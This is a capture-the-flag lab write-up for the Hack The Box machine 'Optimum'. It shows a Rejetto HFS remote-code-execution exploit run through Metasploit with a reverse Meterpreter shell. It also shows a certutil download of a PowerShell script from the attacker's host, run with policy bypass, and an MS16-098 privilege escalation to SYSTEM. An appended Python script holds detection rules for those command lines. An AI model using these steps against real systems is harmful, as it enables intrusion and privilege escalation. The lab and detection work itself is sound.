HTB 7. Optimum

- `nmap -A -T4 -p- 10.10.10.8` reveals only port 80 running `httpd 2.3`
- Going to `10.10.10.8` shows it's a file server
- Search for default credentials (httpd has no default credentials)
  - `searchsploit rejetto` (since rejetto is the vendor of this file server)
- Search Google for `rejetto hfs 2.3 exploit` reveals metasploit remote code execution and many others
- Nmap reveals probably an OS that the exploit works on
- Metasploit
  - `use exploit/windows/http/rejetto_hfs_exec`, set `rhosts`, and set payload to `windows/x64/meterpreter/reverse_tcp`
  - `set lhost tun0` instead of typing in IP (because it's faster)
  - `sysinfo` shows `x64` on `x64` and `getuid` is `kostas`
- Attempt priv esc:
  - `getsystem` fails, `background` and `use post/multi/recon/local_exploit_suggester` (set session 1) and `run` reveals nothing
  - `sherlock` by `rastamouse` (or more up-to-date version `Watson`)
- Search Google for `windows 2002 r2 (build 9600) privilege escalation` reveals `exploit-db` exploit available that might possibly work
- Search `ms16-032` in metasploit shows there is a module for it. Let's `use` it. Set target to `1` which is `x64`. Set `lhost tun0` and `lport 443`. Ran twice; didn't work.
- Manual method: Download `sherlock` above as `sher.ps1`. Start http server with python and use certutil (`certutil -urlcache -f http://10.10.14.14/sher.ps1 sher.ps1`) to download file. Run with `powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}"`. Result: 3 potential vulnerabilities
- Clone AonCyberLabs/Windows-Exploit-Suggester, run `python ./windows-exploit-suggester.py --update`
- Run `systeminfo` in shell on target and put in text file for `windows-exploit-suggester.py`.
- Run `python ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt` which detects `MS16-098` exploit; download exploit from `exploit-db`.
  - `gcc 41020.c ex.exe` fails so let's download the binary from the link provided on `exploit-db`.
- Run python web server, download to target, and run with `sh.exe`.
  - `whoami` gives us `nt authority\system`
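
From the defender's side, the `certutil -urlcache` download and the `powershell.exe -exec bypass` run in the manual method both show up in process-creation logs that record command lines. The following is an added example, not part of the original notes: it matches those command lines and correlates a download followed by a policy-bypass run on the same host. The host names, the benign events and the rule names are constructed for illustration.

```python
import re

# Each rule is a case-insensitive regex over a process-creation command line.
RULES = {
    # certutil used as a downloader: -urlcache (or /urlcache) together with a URL
    "certutil_url_download": re.compile(
        r"\bcertutil(?:\.exe)?\b(?=.*[-/]urlcache\b)(?=.*\bhttps?://)", re.I),
    # PowerShell accepts abbreviated parameter names, so -ep / -ex / -exec all count
    "powershell_policy_bypass": re.compile(
        r"\bpowershell(?:\.exe)?\b.*\s-(?:ep|ex[a-z]*)\s+bypass\b", re.I),
    # a .ps1 pulled in as a module from the working directory
    "import_module_relative_ps1": re.compile(
        r"\bImport-Module\s+\.[\\/]\S+\.ps1\b", re.I),
}

def match_rules(cmdline):
    """Names of all rules that fire on one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def download_then_run(events):
    """Hosts where a certutil download is later followed by a policy-bypass PowerShell."""
    downloaded, flagged = set(), []
    for ev in events:  # events are assumed to be in time order
        fired = match_rules(ev["cmdline"])
        if "certutil_url_download" in fired:
            downloaded.add(ev["host"])
        if "powershell_policy_bypass" in fired and ev["host"] in downloaded:
            if ev["host"] not in flagged:
                flagged.append(ev["host"])
    return flagged

# Constructed sample events (hypothetical hosts; first two command lines are from the notes)
EVENTS = [
    {"host": "FILESRV", "cmdline": "certutil -urlcache -f http://10.10.14.14/sher.ps1 sher.ps1"},
    {"host": "FILESRV", "cmdline": r'powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}"'},
    {"host": "ADMIN01", "cmdline": r"certutil.exe -hashfile C:\Temp\setup.exe SHA256"},
    {"host": "ADMIN01", "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Ops\backup.ps1"},
    {"host": "ADMIN02", "cmdline": r"powershell.exe -NoProfile -File C:\Ops\report.ps1"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["host"], match_rules(ev["cmdline"]) or "-")
    print("download followed by bypass:", download_then_run(EVENTS))
```

The ADMIN01 events show why the correlation matters: a policy-bypass flag alone also fires on routine admin scripts, while the download-then-run sequence does not.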